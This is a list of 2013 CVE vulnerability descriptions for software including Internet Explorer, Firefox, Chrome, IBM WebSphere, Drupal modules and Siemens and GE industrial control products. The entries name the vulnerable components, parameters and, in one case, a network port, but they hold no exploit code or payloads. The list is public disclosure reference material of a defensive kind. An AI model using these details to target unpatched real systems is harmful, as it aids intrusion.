[CVE-2013-0879] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly implement web audio nodes, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
[CVE-2013-0843] content/renderer/media/webrtc_audio_renderer.cc in Google Chrome before 24.0.1312.56 on Mac OS X does not use an appropriate buffer size for the 96 kHz sampling rate, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a web site that provides WebRTC audio.
[CVE-2013-0811] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1307.
[CVE-2013-0796] The WebGL subsystem in Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbird before 17.0.5, Thunderbird ESR 17.x before 17.0.5, and SeaMonkey before 2.17 on Linux does not properly interact with Mesa drivers, which allows remote attackers to execute arbitrary code or cause a denial of service (free of unallocated memory) via unspecified vectors.
[CVE-2013-0795] The System Only Wrapper (SOW) implementation in Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbird before 17.0.5, Thunderbird ESR 17.x before 17.0.5, and SeaMonkey before 2.17 does not prevent use of the cloneNode method for cloning a protected node, which allows remote attackers to bypass the Same Origin Policy or possibly execute arbitrary JavaScript code with chrome privileges via a crafted web site.
[CVE-2013-0794] Mozilla Firefox before 20.0 and SeaMonkey before 2.17 do not prevent origin spoofing of tab-modal dialogs, which allows remote attackers to conduct phishing attacks via a crafted web site.
[CVE-2013-0785] Cross-site scripting (XSS) vulnerability in show_bug.cgi in Bugzilla before 3.6.13, 3.7.x and 4.0.x before 4.0.10, 4.1.x and 4.2.x before 4.2.5, and 4.3.x and 4.4.x before 4.4rc2 allows remote attackers to inject arbitrary web script or HTML via the id parameter in conjunction with an invalid value of the format parameter.
[CVE-2013-0776] Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, Thunderbird before 17.0.3, Thunderbird ESR 17.x before 17.0.3, and SeaMonkey before 2.16 allow man-in-the-middle attackers to spoof the address bar by operating a proxy server that provides a 407 HTTP status code accompanied by web script, as demonstrated by a phishing attack on an HTTPS site.
[CVE-2013-0775] Use-after-free vulnerability in the nsImageLoadingContent::OnStopContainer function in Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, Thunderbird before 17.0.3, Thunderbird ESR 17.x before 17.0.3, and SeaMonkey before 2.16 allows remote attackers to execute arbitrary code via crafted web script.
[CVE-2013-0773] The Chrome Object Wrapper (COW) and System Only Wrapper (SOW) implementations in Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, Thunderbird before 17.0.3, Thunderbird ESR 17.x before 17.0.3, and SeaMonkey before 2.16 do not prevent modifications to a prototype, which allows remote attackers to obtain sensitive information from chrome objects or possibly execute arbitrary JavaScript code with chrome privileges via a crafted web site.
[CVE-2013-0765] Mozilla Firefox before 19.0, Thunderbird before 17.0.3, and SeaMonkey before 2.16 do not prevent multiple wrapping of WebIDL objects, which allows remote attackers to bypass intended access restrictions via unspecified vectors.
[CVE-2013-0763] Use-after-free vulnerability in Mozilla Firefox before 18.0, Firefox ESR 17.x before 17.0.1, Thunderbird before 17.0.2, Thunderbird ESR 17.x before 17.0.1, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via vectors related to Mesa drivers and a resized WebGL canvas.
[CVE-2013-0756] Use-after-free vulnerability in the obj_toSource function in Mozilla Firefox before 18.0, Firefox ESR 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via a crafted web page referencing JavaScript Proxy objects that are not properly handled during garbage collection.
[CVE-2013-0753] Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.
[CVE-2013-0730] Multiple cross-site scripting (XSS) vulnerabilities in Newscoop 4.x through 4.1.0 allow remote attackers to inject arbitrary web script or HTML via vectors involving the (1) language parameter to application/modules/admin/controllers/LanguagesController.php or (2) user parameter to application/modules/admin/controllers/UserController.php.
[CVE-2013-0726] Stack-based buffer overflow in the ERM_convert_to_correct_webpath function in ermapper_u.dll in ERDAS ER Viewer before 13.00.0001 allows remote attackers to execute arbitrary code via a crafted pathname in an ERS file.
[CVE-2013-0717] Multiple cross-site request forgery (CSRF) vulnerabilities in the web-based management utility on the NEC AtermWR9500N, AtermWR8600N, AtermWR8370N, AtermWR8160N, AtermWM3600R, and AtermWM3450RN routers allow remote attackers to hijack the authentication of administrators for requests that (1) initialize settings or (2) reboot the device.
[CVE-2013-0716] The web server in Wind River VxWorks 5.5 through 6.9 allows remote attackers to cause a denial of service (daemon crash) via a crafted URI.
[CVE-2013-0715] The WebCLI component in Wind River VxWorks 5.5 through 6.9 allows remote authenticated users to cause a denial of service (CLI session crash) via a crafted command string.
[CVE-2013-0709] Cross-site scripting (XSS) vulnerability in dopvSTAR* 0091 allows remote attackers to inject arbitrary web script or HTML via the HTTP Referer header, which is not properly handled during display of the access log.
[CVE-2013-0708] Cross-site scripting (XSS) vulnerability in dopvCOMET* 0009b allows remote attackers to inject arbitrary web script or HTML via the HTTP Referer header, which is not properly handled during display of the access log.
[CVE-2013-0703] Cross-site scripting (XSS) vulnerability in imgboard.com imgboard before 1.22R6.1 u and 20xx before 2010u allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0702] Cross-site scripting (XSS) vulnerability in Cybozu Garoon 2.0.0 through 3.5.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0688] Cross-site scripting (XSS) vulnerability in Invensys Wonderware Information Server (WIS) 4.0 SP1SP1, 4.5- Portal, and 5.0- Portal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0680] Stack-based buffer overflow in the web server in Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long HTTP header.
[CVE-2013-0679] Directory traversal vulnerability in the web server in Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and other products, allows remote authenticated users to read arbitrary files via vectors involving a query for a pathname.
[CVE-2013-0678] Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and other products, does not properly represent WebNavigator credentials in a database, which makes it easier for remote authenticated users to obtain sensitive information via a SQL query.
[CVE-2013-0677] The web server in Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and other products, allows remote attackers to obtain sensitive information or cause a denial of service via a crafted project file.
[CVE-2013-0676] Siemens WinCC before 7.2, as used in SIMATIC PCS7 before 8.0 SP1 and other products, does not properly assign privileges for the database containing WebNavigator credentials, which allows remote authenticated users to obtain sensitive information via a SQL query.
[CVE-2013-0672] Cross-site scripting (XSS) vulnerability in the HMI web application in Siemens WinCC (TIA Portal) 11 allows remote authenticated users to inject arbitrary web script or HTML via unspecified data.
[CVE-2013-0671] Directory traversal vulnerability in Siemens WinCC (TIA Portal) 11 allows remote authenticated users to read HMI web-application source code and user-defined scripts via a crafted URL.
[CVE-2013-0670] CRLF injection vulnerability in the HMI web application in Siemens WinCC (TIA Portal) 11 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via a crafted URL.
[CVE-2013-0669] The HMI web application in Siemens WinCC (TIA Portal) 11 allows remote authenticated users to cause a denial of service (daemon crash) via a crafted HTTP request.
[CVE-2013-0668] Multiple cross-site scripting (XSS) vulnerabilities in the HMI web application in Siemens WinCC (TIA Portal) 11 allow remote attackers to inject arbitrary web script or HTML via a crafted URL.
[CVE-2013-0667] Cross-site scripting (XSS) vulnerability in the HMI web application in Siemens WinCC (TIA Portal) 11 allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
[CVE-2013-0659] The debugging feature on the Siemens CP 1604 and CP 1616 interface cards with firmware before 2.5.2 allows remote attackers to execute arbitrary code via a crafted packet to UDP port 17185.
[CVE-2013-0656] Buffer overflow in a third-party ActiveX component in Siemens SIMATIC RF-MANAGER 2008, and RF-MANAGER Basic 3.0 and earlier, allows remote attackers to execute arbitrary code via a crafted web site.
[CVE-2013-0654] CimWebServer in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY 4.01 through 8.0, and Proficy Process Systems with CIMPLICITY, allows remote attackers to execute arbitrary commands or cause a denial of service (daemon crash) via a crafted packet.
[CVE-2013-0653] Directory traversal vulnerability in substitute.bcl in the WebView CimWeb subsystem in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY 4.01 through 8.0, and Proficy Process Systems with CIMPLICITY, allows remote attackers to read arbitrary files via a crafted packet.
[CVE-2013-0651] The Portal installation process in GE Intelligent Platforms Proficy Real-Time Information Portal stores sensitive information under the web root with insufficient access control, which allows remote attackers to read configuration files, and discover data-source credentials, via a direct request.
[CVE-2013-0648] Unspecified vulnerability in the ExternalInterface ActionScript functionality in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.
[CVE-2013-0600] Unspecified vulnerability on IBM WebSphere DataPower XC10 Appliance devices 2.0 and 2.1 through 2.1 FP3 allows remote attackers to bypass authentication and perform administrative actions via unknown vectors.
[CVE-2013-0582] Cross-site scripting (XSS) vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.2.0 before 6.2.0.12, 6.2.1 before 6.2.1.5, and 6.2.2 before 6.2.2.4 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.2.0 before 6.2.0.12 and 6.2.1 before 6.2.1.5 allows remote attackers to inject arbitrary web script or HTML via a crafted URL that triggers a SAML 2.0 response.
[CVE-2013-0581] Multiple cross-site scripting (XSS) vulnerabilities in IBM Business Process Manager (BPM) 7.5.1.x, 8.0.0.x, and 8.0.1 before FP1 allow remote authenticated users to inject arbitrary web script or HTML via vectors involving (1) ProcessPortal/jsp/socialPortal/dashboard.jsp, (2) teamworks/executeServiceByName, (3) portal/jsp/viewAdHocReportWizard.do, or (4) rest/bpm/wle/v1/process.
[CVE-2013-0576] Cross-site scripting (XSS) vulnerability in the Tivoli Enterprise Portal browser client in IBM Tivoli Monitoring 6.2.0 through FP03, 6.2.1 through FP04, 6.2.2 through FP09, and 6.2.3 through FP02 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0571] Cross-site scripting (XSS) vulnerability in IBM Document Connect for Application Support Facility (aka DC4ASF) before 1.0.0.1218 in Application Support Facility (ASF) 3.4 for z/OS on Windows, Linux, and AIX allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
[CVE-2013-0569] Cross-site scripting (XSS) vulnerability in the Communities component in IBM Connections 4.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0565] Cross-site scripting (XSS) vulnerability in the RPC adapter for the Web 2.0 and Mobile toolkit in IBM WebSphere Application Server (WAS) 8.5 before 8.5.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted response.
[CVE-2013-0553] The client implementation in IBM Sametime 8.5.1 through 8.5.2.1, as used in Sametime Connect client, Sametime Advanced Connect client, Sametime Advanced Web client, and other products, allows remote authenticated users to send commands to individual chat users, or to all participants in a chat room, via a crafted Sametime Instant Message (IM).
[CVE-2013-0549] Cross-site scripting (XSS) vulnerability in the Web Content Manager - Web Content Viewer Portlet in the server in IBM WebSphere Portal 7.0.0.x through 7.0.0.2 CF22 and 8.0.0.x through 8.0.0.1 CF5, when the IBM Portlet API is used, allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
[CVE-2013-0548] Multiple cross-site scripting (XSS) vulnerabilities in the Basic Services component in IBM Tivoli Monitoring (ITM) 6.2.0 through FP3, 6.2.1 through FP4, 6.2.2 through FP9, and 6.2.3 before FP3, as used in IBM Application Manager for Smart Business (formerly Tivoli Foundations Application Manager) 1.2.1 before 1.2.1.0-TIV-IAMSB-FP0004 and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0544] Directory traversal vulnerability in the Administrative Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 on Linux and UNIX allows remote authenticated users to modify data via unspecified vectors.
[CVE-2013-0543] IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 on Linux, Solaris, and HP-UX, when a Local OS registry is used, does not properly validate user accounts, which allows remote attackers to bypass intended access restrictions via unspecified vectors.
[CVE-2013-0542] Cross-site scripting (XSS) vulnerability in the Administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 allows remote attackers to inject arbitrary web script or HTML via crafted field values.
[CVE-2013-0541] Buffer overflow in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 on Windows, when a localOS registry is used in conjunction with WebSphere Identity Manager (WIM), allows local users to cause a denial of service (daemon crash) via unspecified vectors.
[CVE-2013-0540] IBM WebSphere Application Server (WAS) Liberty Profile 8.5 before 8.5.0.2, when SSL is not enabled, does not properly validate authentication cookies, which allows remote authenticated users to bypass intended access restrictions via an HTTP session.
[CVE-2013-0538] Cross-site scripting (XSS) vulnerability in IBM Lotus Notes 8.x before 8.5.3 FP4 Interim Fix 1 and 9.0 before Interim Fix 1 allows remote attackers to inject arbitrary web script or HTML via a SCRIPT element in an HTML e-mail message, aka SPRs JMOY95BLM6 and JMOY95BN49.
[CVE-2013-0535] Multiple cross-site scripting (XSS) vulnerabilities in the Classic Meeting Server in IBM Sametime 7.5.1.2 through 8.5.2.1 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0533] Cross-site scripting (XSS) vulnerability in the Sametime Links server in IBM Sametime 8.0.2 through 8.5.2.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0525] Multiple cross-site scripting (XSS) vulnerabilities in IBM iNotes 8.5.x allow local users to inject arbitrary web script or HTML via a shared mail file, aka SPR DKEN8PDNTX.
[CVE-2013-0523] IBM WebSphere Commerce Enterprise 5.6.x through 5.6.1.5, 6.0.x through 6.0.0.11, and 7.0.x through 7.0.0.7 does not use a suitable encryption algorithm for storefront web requests, which allows remote attackers to obtain sensitive information via a padding oracle attack that targets certain UTF-8 processing of the krypto parameter, and leverages unspecified browser access or traffic-log access.
[CVE-2013-0519] IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim Fix 1, 3.4.0 before 3.4.0.6 Interim Fix 1, and 3.4.1 before 3.4.1.7 provides web-server version data in (1) an unspecified page title and (2) an unspecified HTTP header field, which allows remote attackers to obtain potentially sensitive information by reading a version string.
[CVE-2013-0518] IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim Fix 1, 3.4.0 before 3.4.0.6 Interim Fix 1, and 3.4.1 before 3.4.1.7 does not refuse to be rendered in different-origin frames, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site.
[CVE-2013-0512] Stack-based buffer overflow in the Manual Explore browser plug-in for Firefox in IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 and IBM Rational Policy Tester 5.6 and 8.x before 8.5.0.4 allows remote attackers to cause a denial of service (plug-in crash) via a crafted web page.
[CVE-2013-0506] Cross-site scripting (XSS) vulnerability in IBM Sterling Order Management 8.0 before HF127, 8.5 before HF89, 9.0 before HF69, 9.1.0 before FP41, and 9.2.0 before FP13 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0503] Cross-site scripting (XSS) vulnerability in the Bookmarks component in IBM Lotus Connections before 4.0 CR3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0502] Cross-site scripting (XSS) vulnerability in IBM InfoSphere Information Server 8.1, 8.5 through FP3, 8.7 through FP2, and 9.1 allows remote attackers to inject arbitrary web script or HTML via a malformed URL.
[CVE-2013-0501] The EdrawSoft EDOFFICE.EDOfficeCtrl.1 ActiveX control, as used in Edraw Office Viewer Component, the client in IBM Cognos Disclosure Management (CDM) 10.2.0, and other products, allows remote attackers to read arbitrary files, or download an arbitrary program onto a client machine and execute this program, via a crafted web site.
[CVE-2013-0499] Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services.
[CVE-2013-0492] Cross-site scripting (XSS) vulnerability in IBM Informix Open Admin Tool (OAT) 2.x and 3.x before 3.11.1 allows remote authenticated users to inject arbitrary web script or HTML via a crafted URL.
[CVE-2013-0489] Cross-site request forgery (CSRF) vulnerability in webadmin.nsf (aka the Web Administrator client) in IBM Domino 8.5.x allows remote authenticated users to hijack the authentication of administrators.
[CVE-2013-0488] Cross-site scripting (XSS) vulnerability in webadmin.nsf (aka the Web Administrator client) in IBM Domino 8.5.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0482] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 through 8.5.0.2 and WebSphere Message Broker 6.1, 7.0 through 7.0.0.5, and 8.0 through 8.0.0.2, when WS-Security is used, allows remote attackers to spoof the signatures of messages via a crafted SOAP message, related to a "Signature Wrap attack," a different vulnerability than CVE-2011-1377 and CVE-2013-0489.
[CVE-2013-0478] Cross-site scripting (XSS) vulnerability in IBM InfoSphere Master Data Management - Collaborative Edition 10.0 and 10.1 before FP1 and InfoSphere Master Data Management Server for Product Information Management 6.0, 9.0, and 9.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0474] The Manual Explore browser plug-in in IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 and IBM Rational Policy Tester 5.6 and 8.x before 8.5.0.4 allows remote attackers to discover test Platform Authentication credentials via a crafted web site.
[CVE-2013-0473] Multiple cross-site scripting (XSS) vulnerabilities in IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 and IBM Rational Policy Tester 5.6 and 8.x before 8.5.0.4 allow remote attackers to inject arbitrary web script or HTML via a crafted report.
[CVE-2013-0472] The Web GUI in the client in IBM Tivoli Storage Manager (TSM) 6.3 before 6.3.1.0 and 6.4 before 6.4.0.1 allows man-in-the-middle attackers to obtain unspecified client access, and consequently obtain unspecified server access, via unknown vectors.
[CVE-2013-0468] Cross-site scripting (XSS) vulnerability in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2013-2983.
[CVE-2013-0466] Cross-site scripting (XSS) vulnerability in IBM WebSphere Message Broker 7.0 before 7.0.0.6 and 8.0 before 8.0.0.2, when wsdl support is enabled on a SOAPInput node, allows remote attackers to inject arbitrary web script or HTML via a wsdl request that is not properly handled during construction of an error message.
[CVE-2013-0465] Unspecified vulnerability in the IBM WebSphere Cast Iron physical and virtual appliance 6.0 and 6.1 before 6.1.0.15 and 6.3 before 6.3.0.1, when LDAP authentication is enabled, allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors.
[CVE-2013-0464] Multiple cross-site scripting (XSS) vulnerabilities in IBM Eclipse Help System (IEHS) 3.4.3 and 3.6.2, as used in IBM SPSS Data Collection 6.0, 6.0.1, and 7.0, allow remote attackers to inject arbitrary web script or HTML via a crafted URL.
[CVE-2013-0462] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 6.1, 7.0 before 7.0.0.27, 8.0, and 8.5 has unknown impact and attack vectors.
[CVE-2013-0461] Cross-site scripting (XSS) vulnerability in the virtual member manager (VMM) administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.27, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0460] Cross-site request forgery (CSRF) vulnerability in the portlet subsystem in the administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47 and 7.0 before 7.0.0.27 allows remote attackers to hijack the authentication of arbitrary users for requests that insert cross-site scripting (XSS) sequences.
[CVE-2013-0459] Cross-site scripting (XSS) vulnerability in the Administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.27, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0458] Cross-site scripting (XSS) vulnerability in the Administrative console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.27, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2, when login security is disabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0457] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 7.5, Maximo Asset Management Essentials 7.5, and SmartCloud Control Desk 7.5 allows remote authenticated users to inject arbitrary web script or HTML via vectors related to a uisessionid.
[CVE-2013-0455] Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2B Integrator 5.2.4 and Sterling File Gateway allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0453] Cross-site scripting (XSS) vulnerability in Web Reports in IBM Tivoli Endpoint Manager (TEM) before 8.2.1372 allows remote authenticated users to inject arbitrary web script or HTML via a crafted URL.
[CVE-2013-0452] Cross-site request forgery (CSRF) vulnerability in the Software Use Analysis (SUA) application before 1.3.3 in IBM Tivoli Endpoint Manager 8.2 allows remote attackers to hijack the authentication of arbitrary users via a web site that contains crafted Flash Action Message Format (AMF) messages.
[CVE-2013-0416] Unspecified vulnerability in the Siebel Enterprise Application Integration component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Web Services, a different vulnerability than CVE-2013-2403.
[CVE-2013-0328] Cross-site scripting (XSS) vulnerability in CloudBees Jenkins before 1.502 and LTS before 1.480.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0325] Multiple cross-site scripting (XSS) vulnerabilities in the Varnish module 6.x-1.x before 6.x-1.2 and 7.x-1.x before 7.x-1.0-beta2 for Drupal allow remote attackers to inject arbitrary web script or HTML via a crafted (1) Watchdog message or (2) admin setting.
[CVE-2013-0324] Cross-site scripting (XSS) vulnerability in the Rendered links formatter in the Menu Reference module 7.x-1.x before 7.x-1.0 for Drupal allows remote authenticated users with the "Administer menus and menu items" permission to inject arbitrary web script or HTML via the menu link title.
[CVE-2013-0323] Cross-site scripting (XSS) vulnerability in the Display Suite module 7.x-1.x before 7.x-1.7 and 7.x-2.x before 7.x-2.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via the author field.
[CVE-2013-0322] Cross-site scripting (XSS) vulnerability in Views in the Ubercart module 7.x-3.x before 7.x-3.4 for Drupal allows remote attackers to inject arbitrary web script or HTML via the full name field.
[CVE-2013-0321] Cross-site scripting (XSS) vulnerability in Views in the Ubercart Views (uc_views) module 6.x before 6.x-3.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via the full name field.
[CVE-2013-0319] Cross-site scripting (XSS) vulnerability in the Yandex.Metrics module 6.x-1.x before 6.x-1.6 and 7.x-1.x before 7.x-1.5 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors related to the Yandex.Metrica service data.
[CVE-2013-0317] Cross-site scripting (XSS) vulnerability in the Manager Change for Organic Groups (og_manager_change) module 7.x-2.x before 7.x-2.1 for Drupal might allow remote attackers to inject arbitrary web script or HTML via the username in the new manager autocomplete field.
[CVE-2013-0305] The administrative interface for Django 1.3.x before 1.3.6, 1.4.x before 1.4.4, and 1.5 before release candidate 2 does not check permissions for the history view, which allows remote authenticated administrators to obtain sensitive object history information.
[CVE-2013-0275] Multiple cross-site scripting (XSS) vulnerabilities in Ganglia Web before 3.5.6 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0259] Cross-site scripting (XSS) vulnerability in the Boxes module 7.x-1.x before 7.x-1.1 for Drupal allows remote authenticated users with administer or edit boxes permissions to inject arbitrary web script or HTML via the subject parameter.
[CVE-2013-0237] Cross-site scripting (XSS) vulnerability in Plupload.as in Moxiecode plupload before 1.5.5, as used in WordPress before 3.5.1 and other products, allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2013-0236] Multiple cross-site scripting (XSS) vulnerabilities in WordPress before 3.5.1 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) gallery shortcodes or (2) the content of a post.
[CVE-2013-0227] Cross-site scripting (XSS) vulnerability in the Search API Sorts module 7.x-1.x before 7.x-1.4 for Drupal allows remote authenticated users with certain roles to inject arbitrary web script or HTML via unspecified field labels.
[CVE-2013-0225] Cross-site scripting (XSS) vulnerability in the User Relationships module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.0-alpha5 for Drupal allows remote authenticated users with the "administer user relationships" permission to inject arbitrary web script or HTML via a relationship name.
[CVE-2013-0218] The GUI installer in JBoss Enterprise Application Platform (EAP) and Enterprise Web Platform (EWP) 5.2.0 and possibly 5.1.2 uses world-readable permissions for the auto-install XML file, which allows local users to obtain the administrator password and the sucker password by reading this file.
[CVE-2013-0214] Cross-site request forgery (CSRF) vulnerability in the Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.21, 3.6.x before 3.6.12, and 4.x before 4.0.2 allows remote attackers to hijack the authentication of arbitrary users by leveraging knowledge of a password and composing requests that perform SWAT actions.
[CVE-2013-0213] The Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.21, 3.6.x before 3.6.12, and 4.x before 4.0.2 allows remote attackers to conduct clickjacking attacks via a (1) FRAME or (2) IFRAME element.
[CVE-2013-0205] Cross-site request forgery (CSRF) vulnerability in the RESTful Web Services (restws) module 7.x-1.x before 7.x-1.2 and 7.x-2.x before 7.x-2.0-alpha4 for Drupal allows remote attackers to hijack the authentication of arbitrary users via unknown vectors.
[CVE-2013-0198] Dnsmasq before 2.66test2, when used with certain libvirt configurations, replies to queries from prohibited interfaces, which allows remote attackers to cause a denial of service (traffic amplification) via spoofed TCP based DNS queries. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-3411.
[CVE-2013-0181] Cross-site scripting (XSS) vulnerability in Views in the Search API (search_api) module 7.x-1.x before 7.x-1.4 for Drupal, when using certain backends and facets, allows remote attackers to inject arbitrary web script or HTML via unspecified input, which is returned in an error message.
[CVE-2013-0142] QNAP VioStor NVR devices with firmware 4.0.3, and the Surveillance Station Pro component in QNAP NAS, have a hardcoded guest account, which allows remote attackers to obtain web-server login access via unspecified vectors.
[CVE-2013-0129] Multiple cross-site scripting (XSS) vulnerabilities in pd-admin before 4.17 allow remote authenticated users to inject arbitrary web script or HTML via (1) the WebFTP Overview "Create new directory" field or (2) the body of an e-mail autoresponder message.
[CVE-2013-0125] Cross-site scripting (XSS) vulnerability in fileview.asp in C2 WebResource allows remote attackers to inject arbitrary web script or HTML via the File parameter.
[CVE-2013-0095] Outlook in Microsoft Office for Mac 2008 before 12.3.6 and Office for Mac 2011 before 14.3.2 allows remote attackers to trigger access to a remote URL and consequently confirm the rendering of an HTML e-mail message by including unspecified HTML5 elements and leveraging the installation of a WebKit browser on the victim's machine, aka "Unintended Content Loading Vulnerability."
[CVE-2013-0094] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer removeChild Use After Free Vulnerability."
[CVE-2013-0093] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer onBeforeCopy Use After Free Vulnerability."
[CVE-2013-0092] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer GetMarkupPtr Use After Free Vulnerability."
[CVE-2013-0091] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CElement Use After Free Vulnerability."
[CVE-2013-0090] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CCaret Use After Free Vulnerability."
[CVE-2013-0089] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CMarkupBehaviorContext Use After Free Vulnerability."
[CVE-2013-0088] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer saveHistory Use After Free Vulnerability."
